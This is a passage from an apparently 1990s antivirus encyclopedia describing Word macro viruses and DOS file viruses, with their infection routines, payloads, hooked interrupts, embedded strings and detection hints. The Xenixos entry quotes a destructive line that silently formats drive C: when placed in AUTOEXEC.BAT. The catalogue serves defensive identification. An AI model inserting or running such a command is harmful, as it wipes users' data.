Wazzu.F does not contain any destructive payload, such as
changing documents. Wazzu.F is only infectious.
The following message is displayed with a 1/10 chance:
" This one's for you, Bosco. "
[Word.Wazzu.G]
Virus name: Word.Wazzu.G
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 632 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.G has a slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. There is a
3/5 chance that one word is moved to another position in the
active document.
[Word.Wazzu.H]
Virus name: Word.Wazzu.H
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 943 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
Wazzu.H is a newly rewritten Wazzu variant. Each of its six
payloads triggers with a chance of 1/6.
One payload displays the following message:
" Thank's for using Microsloth Warp for Windblowz "
Other payloads create 20 new documents or delete all files in
the root directory (C:\*.*).
Wazzu.H infects the global template when an infected
document is opened. Further files become infected when they
are also opened (AutoOpen).
[Word.Wazzu.I]
Virus name: Word.Wazzu.I
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 333 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.I is another "do-nothing" macro
virus with no payload and slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.J]
Virus name: Word.Wazzu.J
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 675 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: Yes
Common In-The-Wild: Yes
Description:
The difference between this new variant and the original
Wazzu.A virus is that some spaces have been deleted from
the macro virus code.
For more information, please refer to the Wazzu.A virus
description.
[Word.Wazzu.K]
Virus name: Word.Wazzu.K
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 632 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.K is another "do-nothing" macro
virus with a corrupted payload and slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.L]
Virus name: Word.Wazzu.L
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 347 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.L has some modified codes.
It infects the global template when an infected document is
opened. Further documents become infected when they are
also opened (AutoOpen).
When a user opens a document, Wazzu.L adds the following
text at the end of the document:
" wazzu! "
[Word.Wazzu.M]
Virus name: Word.Wazzu.M
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 443 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.M is another "do-nothing" macro
virus with a corrupted payload and slightly modified code.
Due to the corruption, Word displays an error message.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.N]
Virus name: Word.Wazzu.N
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 432 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that the code has been slightly modified.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.O]
Virus name: Word.Wazzu.O
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 309 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: Yes
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.O is another "do-nothing" macro
virus with no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.P]
Virus name: Word.Wazzu.P
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 460 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: Yes
Description:
The difference between this new variant and the original
Wazzu.A virus is that the payload has been deleted from the
code.
Wazzu.P is still able to infect the global template when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.Wazzu.Q]
Virus name: Word.Wazzu.Q
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 331 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.Q is another "do-nothing" macro
virus with no payload and slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.R]
Virus name: Word.Wazzu.R
Virus Type: Word macro virus
Number of macros: 1
Encrypted: Yes
Macro names: AutoOpen
Size of macros: 552 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
Wazzu.R is a minor variant of Wazzu.F with some additional
codes. Wazzu.R displays the following message with a 1/10
chance:
" This one's for you, Bosco. "
Wazzu.R infects the global template (normal.dot) when an
infected document is opened. Further documents become
infected when they are also opened (AutoOpen).
[Word.Wazzu.S]
Virus name: Word.Wazzu.S
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 343 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.S is another "do-nothing" macro
virus with a corrupted payload and slightly modified code.
Due to the corruption, Word displays an error message.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.T]
Virus name: Word.Wazzu.T
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 431 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.T is another "do-nothing" macro
virus with no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.U]
Virus name: Word.Wazzu.U
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 621 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.U has a slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. There is a
3/5 chance that one word is moved to another position in the
active document.
[Word.Wazzu.V]
Virus name: Word.Wazzu.V
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 375 Bytes
Place of origin: Unknown
Date of origin: Unknown
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.V is another "do-nothing" macro
virus with some corrupted codes and no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
It also contains the following comment in its code:
" REM This macro wipes out the Wazzu Virus! "
[Word.Wazzu.W]
Virus name: Word.Wazzu.W
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 332 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.W is another "do-nothing" macro
virus with no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
[Word.Wazzu.X]
Virus name: Word.Wazzu.X
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 617 Bytes
Place of origin: Unknown
Date of origin: 1996
Destructive: No
Common In-The-Wild: Yes
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.X is another "do-nothing" macro
virus with no payload.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
Wazzu.X contains the following comment in its code:
" The Meat Grinder virus - Thanks to Kermit the Frog, "
" ' and Kermit the Protocol "
Wazzu.X is also able to convert itself to the Word97 Word
format (Word8).
[Word.Wazzu.Z]
Virus name: Word.Wazzu.Z
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: AutoOpen
Size of macros: 666 Bytes
Place of origin: Unknown
Date of origin: Unknown
Destructive: Yes
Common In-The-Wild: No
Description:
The main difference between this new variant and previous
Wazzu viruses is that Wazzu.Z has a slightly modified code.
It infects the global template when an infected document is
opened. Further documents become infected when they are also
opened (AutoOpen).
The payload is similar to the original Wazzu virus. For
additional information, please refer to the Wazzu.A virus
description.
[Word.Wazzu.Y]
Virus name: Word.Wazzu.Y
Virus Type: Word macro virus
Number of macros: 1
Encrypted: No
Macro names: autoOpen
Size of macros: 652 Bytes
Place of origin: Unknown
Date of origin: Unknown
Destructive: Yes
Seen In-The-Wild: No
Description:
The difference between this new variant and the original
Wazzu.A virus is that some TABs have been replaced by
spaces in the source code. This has no effect on the
behavior of this new variant.
For further information, please refer to the Wazzu.A virus.
[Word.Trojan.Wieder.A (a.k.a. Pferd, Wieder÷ffnen)]
Virus name: Word.Trojan.Wieder.A (a.k.a. Pferd, Wieder÷ffnen)
Virus Type: Word macro virus
Number of macros: 2
Encrypted: No
Macro names: AutoOpen, AutoClose
Size of macros: 638 Bytes
Place of origin: Germany
Date of origin: Spring 1996
Destructive: Yes
Common In-The-Wild: No
Description:
Wieder is not a virus but a trojan horse. It does not infect
other files.
When an infected document is opened, Wieder creates the
directory "C:\TROJA", and moves the system file
"C:\AUTOEXEC.BAT" into the newly created directory.
After moving the file the original files are deleted.
When closing an infected document, the following messages are
displayed:
" Auf Wieder÷ffnen "
" P.S: Falls Sie Ihre AUTOEXEC.BAT - Datei "
" gerne wiederhaben moechten, sollten Sie einen "
" Blick in das neue Verzeichnis C:\TROJA werfen... "
The original document, which included the trojan, has the
following messages:
" Trojanisches Pferd "
" Wenn Sie diese Zeilen lesen, wurde bereits Ihre AUTOEXEC.BAT- "
" Datei aus dem Hauptverzeichnis C:\ entfernt. Hoffentlich haben "
" Sie eine Kopie davon ? "
" Genauso einfach waere es gewesen, Ihre Festplatte zu loeschen "
" und mit ein klein wenig mehr Aufwand koennte man auch einen "
" Virus installieren. "
[Word.Xenixos.A (a.k.a. Nemesis, Evil One, XOS)]
Virus name: Word.Xenixos.A (a.k.a. Nemesis, Evil One, XOS)
Virus Type: Word macro virus
Number of macros: 11
Encrypted: Yes
Macro names: AutoExec, AutoOpen, DateiBeenden, DateiDrucken,
DateiDruckenStandard, DateiOeffnen, DateiSpeichern,
SateiSpeichernUnter, Drop, Dummy, ExtrasMakro
Size of macros: 31342 Bytes
Place of origin: Austria
Date of origin: February 1996
Destructive: Yes
Common In-The-Wild: No
Description:
Xenixos was the first macro virus that was written especially
for the German version of Microsoft Word. All macro names
are in German, and therefore it only works with the German
Word version.
The infected global template (normal.dot) includes the
following additional macros:
"AutoClose"
"AutoExit"
"AutoNew"
When an infected document is opened, Xenixos infects the
global template unless the "DateiSpeichernUnter" macro is
already present. Further documents become infected when
using the "DateiSpeichern" and "DateiSpeichernUnter"
commands. Files with the name "VIRUS.DOT" will not become
infected.
During infection, Xenixos checks the system date and then
activates various destructive payloads according to the date.
During the month of May it adds the following text to
"C:\AUTOEXEC.BAT":
" @echo j format c: /u > nul "
This will format the C:\ drive.
During the month of March, Xenixos tries to activate the
DOS virus "Neuroquila" by using a DOS DEBUG script.
This part of the virus is faulty (it tries to create an .EXE file)
and therefore the DOS-based virus never infects the system.
The third destructive payload checks the system time, and in
case of a value larger than 45 in the seconds field, it will add
the password "XENIXOS" to a saved document.
Upon printing a document, Xenixos checks the system time
again, and in case of a value smaller than 30 in the seconds
field, it will add the following text at the end of the printed
document:
" Nemesis Corp. "
Xenixos also replaces the Tools|Macros to make recognition of
an infected document more difficult (called macro stealth
technique). The new code displays the following error
message instead of the activation of Word's built-in macro
viewer/editor:
" Diese Option ist derzeit leider nicht verfuegbar "
In addition, Xenixos changes section "Compatibility" inside
the win.ini file. It sets the variable "RR2CD" to the value
"0x0020401", and the variable "Diag$" to "0". The WIN.INI
variables can be used to deactivate the virus. Setting the
variable "Diag$" to "1" will prevent most of the destructive
payloads.
[Word.Xenixos.B]
Virus name: Word.Xenixos.B
Virus Type: Word macro virus
Number of macros: 11 (24)
Encrypted: Yes
Macro names: Drop, Dummy, AutoExec, AutoOpen, DateiOEffnen,
ExtrasMakro, DateiBeenden, DateiDrucken,
DateiSpeichern, DateiSpeichernUnter,
DateiDruckenStandard
Size of macros: 31342 Bytes
Place of origin: Germany
Date of origin: February 1996
Destructive: Yes
Common In-The-Wild: No
Description:
The difference between this new variant and the original
Xenixos.A virus is that the first four bytes of the
"DateiDruckenStandard" macro are changed.
This new variant still activates and infects further
documents.
Xenixos.B only works with the German version of Microsoft
Word, since it uses language specific macros.
For more information, please refer to the Xenixos.A virus
description.
[Word.Zero.A:De]
Virus name: Word.Zero.A:De
Virus Type: Word macro virus
Number of macros: 9
Encrypted: Yes
Macro names: dok, dsu, wrd, extrasmakro, dateischliessen,
dateispeichern, dateidokvorlagen,dokumentschliessen,
dateispeichernunter
Size of macros: 727 Bytes
Place of origin: Germany
Date of origin: February 1997
Destructive: No
Seen In-The-Wild: No
Description:
Zero uses a new infection technique. Instead of infecting the
global template (normal.dot), it creates a file (0.DOT) in the
"STARTUP" (default: C:\MSOFFICE\WINWORD\STARTUP) directory.
Zero activates when the "DokumentSchliessen" or
"Extrasmacro" option is used. After creating the 0.dot file it
copies its virus macros to the active document when the
"DateiSpeichern" or "DateiSpeichernUnter" option is used.
Zero also uses "Extrasmacro" to make recognition of an
infected document more difficult (called macro stealth technique).
[Word.Generic]
Virus name: Word.Generic (any unknown Macro virus)
Virus type: Word macro virus
Number of macros: Virus Dependent
Encrypted: Virus Dependent
Macro names: Virus Dependent
Size of macros: Virus Dependent
Place of origin: Anywhere
Date of origin: Virus Dependent
Destructive: Virus Dependent
Common In-The-Wild: Virus Dependent
Description:
"Word.Generic Macro Virus" is the generic name used by Trend Micro's
antivirus researchers to describe Macro viruses of unknown origin and
routine detected by the MacroTrap.
Unlike the strict virus pattern matching methodology used to detect
known viruses, the Trend Micro MacroTrap identifies Macro viruses that
have not been previously identified by antivirus researchers. Such
viruses can exist in either the "Wild" (viruses infecting real users)
or in the "Zoo," (viruses known only to antivirus researchers).
Before an antivirus product can detect and clean unknown macro viruses,
the virus must first be found and isolated. The virus is then analyzed
to learn it's damage routine and a "signature" is developed so the virus
can be quickly identified and removed from infected files. The signature
is incorporated into the virus pattern file which is made available to
the public, typically at biweekly intervals.
But because Macro viruses are so easy to create and spread, it is not
practical to rely solely on virus pattern matching and up-to-date
signatures to identify the stream of new macro viruses. Considering that
"virus kits" are now available via the Internet, and considering the
pervasive reach of e-mail, the only reliable long-term solution against
the flow of Macro viruses clearly is Trend's rules-based MacroTrap.
Unknown macro viruses range in complexity and threat from innocuous
(for example the original Word.Concept virus) to the viscously
destructive (for example, Word.MDMA, deletes every file on your hard
drive). When MacroTrap detects and cleans files infected with Word-based
Macro viruses, both the virus and the infected macro are removed. They
can be deleted or quarantined, depending on the user's preference.
Trend Micro is the first to develop this technology and we have
incorporated it into our entire line of antivirus products to augment
our award winning 32-bit, multi-threading scan engine.
[Jerusalem.1244]
Virus Type: File Virus
Other Name:
Virus Length: 1456 bytes
Virus Reinfect Type: doesn't reinfect
Place of Origin:
Virus Memory Type: MCB Type
PC Vectors Hooked: Int 21h, Int 8h
Infection Procedure:
1) Modifies the allocated memory, BX=5Eh and ES=114Ch then gets
the interrupt vector, hooking int 21h, sets it and gets the
interrupt vector, this time hooking int 8h then sets it.
2) It gets the date and checks whether the date is January 1. If
it is, it moves a value of 0h to DS:[0003]; if not, it compares
it immediately to DS:[0003].
3) It gives back the address 114ch to ES then gets the data stored
in ES:[2C] and places it in ES. Then it frees allocated memory,
ES=1043 paragraph address of the start of the memory block.
4) It gets the child's return code and terminate-and-stay-resident.
[Jerusalem.1500]
Virus Type: File Virus
Virus Length: 2160 bytes
Virus Reinfect Type: doesn't reinfect
Place of Origin:
Virus Memory Type: MCB Type
PC Vectors Hooked: Int 21h
Infection Procedure:
1) It sets a new date for the system but the specified date is
invalid.
2) It modifies the allocated memory BX=80h and ES=114Ch.
[Mummy-2]
Virus Type: File Virus
Virus Length: 1648 bytes
Original Name:
Place of Origin:
Virus Memory Type: MCB Type
PC Vectors Hooked: Int 21h
Infection Procedure:
1) Encrypts the data found in address 1152:049Eh up to 1152:04E5h
and forms "PC Virus Mummy Ver. 2.1.Kaohsiung Senior School Tzeng
Jau Ming presents" then saves the address of ES to CS:[494], [458],
[442], [446], [44A].
2) Adds 10h to the address of ES and stores it to CS:[400] and [45C].
3) Moves the original header of the program to be ready for execution,
modifies the allocated memory, and gets the interrupt vector.
4) Saves the value of ES and BX to addresses CS:[044C] and CS:[044E]
respectively.
5) Executes the child program.
Detection method: Check for the following message:
"PC Virus Mummy Ver 2.1 Kaohsiung Senior School Tzeng Jan Ming
presents"
[Jers-Zero-Aust.A]
Virus Type: File Virus
Virus Length: 2000 bytes
Trigger Condition: Year must be 1992 up, Day must be Friday
Virus Reinfect Type: doesn't reinfect
Place of Origin:
Virus Memory Type: MCB Type
PC Vectors Hooked: Int 21h
Infection Procedure:
The virus obviously is a softmice type, having to encrypt
CS:[SI] or 114C:[11E] to 114C:[7AD] by XOR it to 0Eh, then
encrypt CS:[SI] again but this time it's from 115C:[EB] to
115C:[159], XOR it from 1Eh, IEh increments by 1, it loops
until 6Fh. Then it saves ES which is 114C to 4 different
locations. Then it adds 10h to 114Ch and saves it in CS:[0115]
by adding what is stored in it and also in CS:[0111]. Then it
replaces the data stored in DS:SI to ES:DI which are the
same. No replacement were made. Then it modifies the allocated
memory, BX=9Bh and ES=114Ch. Gets the interrupt vector by hooking
Int 21h, then sets it. Gets the Date and checks if the year is
1992 up and the day is Friday. Next, it frees the allocated
memory then gets the child process. Lastly, it terminates and
stays resident.
While memory resident, the virus infects any COM and/or EXE files.
Does not load if it is already memory resident.
[MacGyver.2803.A]
Virus Type: File Virus
Virus Length: 2803 bytes
Virus Infect Type: EXE only
Virus Memory Type: MCB Memory Resident
Place of Origin:
PC Vectors Hooked: INT 01h, INT 21h
Infection Procedure:
1) Moves its code to the memory location nearest the MCB chain.
2) Makes it memory resident.
3) Gives the control to where the code was transferred and then
calls the function "Get DOS Version No."
4) Hooks INT 1 and INT 21.
5) Modifies the Memory Block and allocates 3072 bytes.
Note:
This virus hooks INT 01h (a Single Step Interrupt used by debuggers
like DEBUG and LDR).
[Backform.2000.A1]
Virus Type: File Virus
Virus Length: 1855 bytes
Virus Infect Type: .COM files
Virus Memory Type: Non-memory resident
Place of Origin:
PC Vectors Hooked:
Infection Procedure:
1) Searches for COMMAND.COM in drive C. If the search fails, the virus
terminates. If the file is present, it checks if its first byte is a
jump instruction (E9H). If it is, it infects it; if not, the virus
terminates leaving no harm to the file.
After attaching itself to the file the virus is executed every time
the system boots up.
2) Checks whether the current month is June. If it is, then it searches
and infects .COM files in drive A.
Damage:
Detection method: Infected files increase by 2051 bytes.
Note:
[Vacsina_2]
Other Name: VACSINA
Place of Origin:
Virus Type: File Virus
Virus Length:
Virus Re-infect: Does not reinfect
Virus Memory Type: MCB Type
PC Vectors Hooked: INT 21h
Infection Procedure:
1) Loads itself to high memory. Loads 1216 bytes in the memory.
2) Infects *.COM and *.EXE files. Copies the virus code to the host
program.
The virus loads first before running the host program. While in the
memory, the virus infects all files that are opened.
Note:
The virus tries to create a new segment address for it to run its code.
This one is used primarily to switch between the host program and the
virus itself. Using Int 21, Function 50. What it does basically is to
tell the operating system that the TSR code is the primary process
rather than the interrupted process of the program. This creates an
initial execution rather than executing the original code first.
In this way, the virus is able to run, then it can copy itself to the
host using Int 21, functions 35 and 25. The copy process is finalized
when the virus code sets the DTA. In this effect the virus can stick to
the host program and run in the future.
[BADSECTOR.3428]
Virus Name: BADS3428
Virus Type: Parasitic, File Virus
Virus Length: 3,434 bytes
Original Name: BAD SECTOR 1.2
Virus Infect Type: .COM files
Virus Memory Type: High memory resident
Place of Origin:
PC Vectors Hooked: INT 8h, INT 16h, INT 26h
INT 21h, INT 25h
Infection Procedure:
The virus only infects .COM files. It increases an infected file's size
by 3,434 bytes. The virus infects the host file by attaching itself at
the end of the file. The virus becomes memory resident upon loading and
executing an infected file. While memory resident it can corrupt other
.COM files on the disk when a file is opened or copied, and sometimes
causes a memory allocation error. It can also hide the change in the
size of infected files when resident. The virus replicates its code in
the high memory at 9EC0:0000 and stays resident there. It hooks INT 21
and changes its vector to point to its program in the high memory at
9EC0:002A. It uses this interrupt to attach itself to the host program.
It also hooks to other interrupts such as INT 8H (9EC0:0876), INT 16H
(9EC0:08A5), INT 25H (9EC0:0FBC), and INT 26H (9EC0:0FC6), but no
payload is seen. The virus just replicates itself and corrupts existing
.COM files. Text strings can be seen inside the virus code which is:
"Bad Sectors 1.2"
"COMEXE"
Damage: Corrupts executable files.
Detection method: Infected files increase by 3,434 bytes.
Note:
[Tai-Pan.438.A]
Virus Type: File Virus
Virus Length: Approximately 438 bytes
Virus Memory Type: High Memory
PC Vectors Hooked: INT 21h
Infection Procedure:
1) Loads itself to high memory. Loads approximately 512 bytes in
the memory.
2) Infects *.EXE files. Copies the virus code to the host program.
Adding approximately 438 (01B6H) bytes. Loads the virus first
before running the host program. While in the memory, EXE files
that are opened get infected.
The virus reacts ordinarily by allocating space in the memory before
infecting files, using Int 21 (48). Nothing extraordinary happens.
It just attaches its code to the host program after it is loaded from
the memory.
Damage:
Symptoms: Free memory decreases. Increase in file size.
May display:
"[Whisper Presenterar Tai-Pan]"
which appears in the virus code.
Detection method: Check for the above message.
Note:
[Tai-Pan.666]
Virus Type: File Virus
Virus Length: Approximately 666 bytes
Virus Memory Type: High Memory
PC Vectors Hooked: INT 21h
Infection Procedure:
1) Loads itself to high memory. Loads approximately 710 bytes in
the memory.
2) Infects *.EXE files. Copies the virus code to the host program,
adding approximately 666 (029AH) bytes. Loads the virus first
before running the host program. While in the memory, EXE files
that are opened get infected.
The virus reacts ordinarily by allocating space in the memory before
infecting files, using Int 21 (48). Nothing extraordinary happens.
It just attaches its code to the host program after it is loaded from
the memory.
Damage:
Symptom: Free memory decreases. Increase in file size.
May display:
"DOOM2,EXE. Illegal DOOM II signature"
"Your version of DOOM2.EXE matches the illegal RAZOR release of DOOM2"
"Say bye-bye HD"
"The programmer of DOOM II DEATH is in no way affiliated with ID
Software."
"ID Software is in no way affiliated with DOOM II DEATH."
which appears in the virus code.
Detection method: Check for the above messages.
Note:
[Keypress-9]
Virus Type: File Virus (COM and EXE files)
Place of Origin:
Virus Memory Type:
PC Vectors Hooked: INT 21h
Infection Procedure:
The virus hooks INT 21h to infect COM and EXE files,
increasing their sizes by 2 kbytes. After the virus is
executed, it waits for an EXE and/or COM files to infect.
It infects all COM and EXE files except COMMAND.COM.
Infected files contain the following messages:
"This is an [ illegal copy ] of keypress virus remover"
"Systems Halted."
"Eternal Fair"
The virus doesn't reinfect if the file being executed
is already infected.
[BBS.1643]
Virus Type: File Virus, Soft Mice
Other Name: Major BBS
Virus Length: 1642-1644 bytes
Virus Infect Type: EXE files only
Virus Memory Type: High Memory Resident
Place of Origin:
PC Vectors Hooked: INT 21h, INT 8h
Infection Procedure:
1) Decrypts 1595 bytes of its virus code.
2) Checks if the file executed is already infected. If it is not,
the virus copies its encrypted code onto it. Then it copies its
1644 bytes of code to the high memory but allocates 30384 bytes in
memory.
3) Gets the DOS Re-entrancy Flag which DOS looks up when INT 21h is
used.
4) Hooks INT 21 and INT 8 and then terminates.
Damage: There is no evident damage this virus can do but will
decrypt this message:
"The Major BBS Virus"
"created by Major tomTugger"
Detection method: This virus will display a write-protect error when
a read command is executed (like opening a file).
[Maltese_Amoeba]
Virus Type: File Virus, Soft Mice
Other Name: AMOEBA
Virus Length: 3589 bytes
Trigger Condition: Nov. 1, Mar. 15
Virus Re-infect:
Virus Memory Type: High Memory Resident
Place of Origin: MALTA
PC Vectors Hooked: INT 21h
Infection Procedure:
1) Decrypts 1184 bytes of its virus code.
2) Checks if the executed file is an uninfected EXE or COM file. If
it is, the virus infects it.
3) Allocates 4096 bytes in the high memory area and transfers 3589
bytes of its virus code to HMA.
4) Hooks INT 21.
5) Returns control to the original routine.
Damage:
If the system date is November 1 or March 15, the virus formats
the hard disk by overwriting the first 4 sectors of every track
with garbage. This destroys the boot sector and the File Allocation
Table. This also makes the hard disk a non-DOS partition disk.
The virus also formats the floppy disk (if present).
The virus will also display garbage and random screen colors.
This message can be found in the virus code:
"AMOEBA virus by the Hacker Twins (c) 1991"
"This is nothing, wait for the release of"
"AMOEBA II-the universal infector hidden to"
"any eye but ours!"
"Dedicated to the University of Malta-the worst"
"educational system in the universe and destroyer"
"of 5x2 years of human life"
This message will appear on the screen after the virus has trashed
the hard disk:
"To see a world in a grain of sand,
And a heaven in a wild flower
Hold Infinity in the palm of your hand
And Eternity in an hour."
THE VIRUS 16/3/91
[Vampiro.A]
Virus Type: File Virus
Virus Length:
Virus Memory Type: High Memory
PC Vectors Hooked: INT 21h
Infection method:
1) Gets the system date and time. It executes the virus code if
the current month is earlier than June, or the time is earlier
than 10 pm.
The virus infects *.COM files not in the root directory. It opens
and searches subdirectories where it looks for *.COM files to infect.
It attaches itself to the host program.
Damage:
The virus infects files in the subdirectory.
If trigger date and time are not satisfied, it displays:
"Zarathustra & Drako les comunican que llego la hora de ir a
dormir. Shh! Vampiro Virus."
Notes:
1) Non-resident virus.
2) Does not use memory allocation.
3) Runs directly.
Symptom:
The following strings can be found in the code:
"Zarathustra & Drako les comunican que llego la hora de ir
a dormir. Shh! Vampiro Virus."
"Command.com all xray, memory allocation error."
"Cannot uninstall xray, it has not been installed."
"???????????"
[Mange-Tout.1099]
Virus Type: File Type (EXE files)
Virus Length:
Virus Memory Type: High Memory Resident
Place of Origin:
PC Vectors Hooked: INT 08h, INT 09h, INT 21h
Infection Procedure:
1) Copies its code to address 0054:0000.
2) Does a series of ins and outs at port 21h.
3) Hooks INT 8, 9, and 21.
4) Checks the carrier file if it is an EXE file. If it is, the virus
infects it by transferring the first 198 bytes of the original code
at the end of the file and transfering the virus code at the
beginning.
[TP39VIR]
Other Name: Yank-39
Virus Type: File Virus
Virus Length: Approximately 2768 bytes
Virus Memory Type:
Trigger: Triggers if time is 5:00 pm of any day.
Plays part of the song: "Jack and Jill"
Run Directly: Loads virus code to high memory
PC Vectors Hooked: Int 21
Infection Procedure:
1) Loads itself to high memory, allocating 2896 bytes.
2) Moves 2768 bytes onto the memory.
3) Infects *.COM and *.EXE files. Copies the virus code to the
host program. Loads the virus first before running the host
program.
[Yank-D.TP.44.A]
Other Name: Yank-44A
Virus Type: File Virus
Virus Length: Approximately 2880 bytes
Virus Memory Type:
Trigger Condition: Triggers if time is 5:00 pm of any day.
Plays part of the song: "Jack and Jill"
Run Directly: Loads virus code to high memory
PC Vectors Hooked: Int 21
Infection Procedure:
1) Loads itself to high memory, allocating 3008 bytes.
2) Moves 2880 bytes onto the memory.
3) Infects *.COM and *.EXE files. Copies the virus code to the
host program. Loads the virus first before running the host
program.
[Xpeh.4928]
Other Name: Yankxpeh
Virus Type: File Virus
Virus Length: Approximately 4768 bytes
Place of Origin:
Run Directly: Loads virus code to high memory
PC Vectors Hooked: Int 21
Infection Procedure:
1) Loads itself to high memory, allocating 4944 bytes.
2) Moves 4768 bytes onto the memory.
3) Infects *.COM and *.EXE files. Copies the virus code to the
host program. Loads the virus first before running the host
program.
[Tanpro.5241]
Virus Name: Tanpro
Virus Type: File Virus
Virus Length: Approximately 524 bytes
Virus Memory Type: High Memory
Place of Origin:
PC Vectors Hooked: Int 21, Int 27
Infection Procedure:
Uses TSR, Int 27. Allocates 3104 bytes (using MEM) of the memory.
Creates a hidden un-named file within the root directory with a size
of 10000 bytes. Within the code is the string "This file is
infected..." Executes this program, deletes it afterwards then calls
Int 27, to retain its possession of the memory for further infection
of other files. Infects *.COM and *.EXE files. Copies the virus code
to the host program, adding approximately 524 bytes. Loads the virus
first before running the host program.
The virus, while memory resident, infects any executed *.COM and
*.EXE files. It does not do anything special. It just replicates when
it is memory resident. Infects file only if it is executed.
Damage:
1) Free memory decreases by approximately 3104 bytes.
2) Increases file size by approximately 524 bytes.
Symptom:
1) Delay in program execution due to virus activity.
2) Text string: "(c) tanpro'94" appears within the virus code.
Detection method: Locate mentioned text string.
[Manzon]
Virus Type: File Virus, Soft Mice
Virus Length: 1712 Bytes
Virus Infect Type: COM files
Virus Memory Type: High Memory Resident
Place of Origin:
PC Vectors Hooked: INT 21h
Infection Procedure:
1) Decrypts 1417 bytes of its code and then allocates 1728 bytes
in HMA.
2) Transfers its code to HMA with a size of 1712 bytes.
3) Hooks INT 21.
4) Returns control to the original routine.
The virus code has text strings of programs and dos utilities which the
virus uses to compare with the target file. This method makes detection
more difficult.
[Kaos4.A]
Virus Type: File Virus
Virus Length:
Place of Origin:
Virus Memory Type: Non Resident
PC Vectors Hooked :
Infection Procedure:
